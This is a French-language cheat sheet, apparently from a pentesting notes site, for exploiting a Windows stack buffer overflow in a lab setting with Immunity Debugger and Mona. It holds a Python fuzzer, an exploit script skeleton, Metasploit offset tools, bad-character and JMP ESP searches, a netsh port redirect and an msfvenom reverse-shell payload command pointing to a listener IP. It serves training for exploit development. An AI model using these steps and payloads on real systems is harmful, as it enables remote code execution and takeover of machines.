Exploitation Buffer Overflow avec Immunity Debugger et Mona

Redirection de Port avec netsh

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=3333 connectaddress=127.0.0.1 connectport=4444 protocol=tcp

Configuration de Mona dans Immunity Debugger

!mona config -set workingfolder c:\mona\%p
# %p = nom du fichier sans extension

Fuzzing pour Déterminer la Taille du Buffer

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.220.0"
port = 9999
timeout = 5
prefix = "OVER "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing avec {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashé à {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Script d'Exploitation Initial

import socket

ip = "10.10.220.0"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Envoi du buffer malveillant...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Fait !")
except:
  print("Connexion impossible.")

Création d'un Pattern de Débordement

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Récupération de l'EIP après crash

/usr/bin/msf-pattern_offset -l 600 -q 35724134

Recherche des Bad Characters

Dans Immunity Debugger :

!mona bytearray -b "\x00"

Génération d'une liste complète de badchars :

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

Comparaison avec Mona après exécution :

!mona compare -f C:\mona\brainpan\bytearray.bin -a <ESP_ADDRESS>

Possibles badchars additionnels : \x0a\x0d

Trouver une Adresse de Jump ESP

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

Adresse obtenue (exemple) : \xaf\x11\x50\x62 (à inverser pour l'utiliser dans l'exploit).

Génération du Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.73.224 LPORT=4444 EXITFUNC=thread -b "\x00" -f py

Ajout de NOPs (No Operation)

nop_sled = "\x90" * 10

Exploitation Finale

Injection dans le script d'exploit avec buffer structuré.

PrécédentGDB - Débogage et Exploitation Suivant08. Programmation

Mis à jour il y a 1 an

hashtagRedirection de Port avec netsh

hashtagConfiguration de Mona dans Immunity Debugger

hashtagFuzzing pour Déterminer la Taille du Buffer

hashtagScript d'Exploitation Initial

hashtagCréation d'un Pattern de Débordement

hashtagRécupération de l'EIP après crash

hashtagRecherche des Bad Characters

hashtagTrouver une Adresse de Jump ESP

hashtagGénération du Shellcode

hashtagAjout de NOPs (No Operation)

hashtagExploitation Finale